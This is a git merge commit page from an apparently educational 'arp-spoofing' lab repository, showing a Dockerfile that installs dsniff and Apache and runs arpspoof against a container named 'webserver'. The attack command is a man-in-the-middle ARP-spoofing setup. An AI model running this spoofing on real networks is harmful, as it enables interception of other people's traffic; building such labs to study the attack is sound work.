Merge branch 'main' of git.leizour.fr:CyberFlingues/arp-spoofing into main

This commit is contained in:
iMax 2025-01-21 11:02:25 +01:00
commit 906a9ecb61
34 changed files with 3 additions and 3 deletions

View file

@ -0,0 +1,15 @@
FROM debian
COPY ./ip_forward /usr/local/bin/ip_forward
COPY ./index1.html /var/www/html/
RUN apt-get update && apt-get install -y dsniff net-tools apache2 \
&& rm -rf /var/lib/apt/lists/* \
&& apache2ctl start
CMD ["arpspoof", "-i", "eth0", "-t", "webserver", "-r", "webserver"]